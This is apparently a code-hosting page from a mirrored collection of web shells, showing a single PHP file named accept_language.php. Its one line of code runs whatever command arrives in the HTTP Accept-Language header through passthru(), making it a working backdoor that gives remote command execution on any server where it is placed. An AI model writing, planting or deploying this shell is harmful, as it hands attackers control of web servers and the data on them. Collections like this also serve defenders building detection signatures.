1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 21:01:29 +00:00
Files
webshell/xakep-shells/PHP/accept_language.php.txt
2014-05-18 09:06:34 +08:00

2 lines
76 B
Plaintext

<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>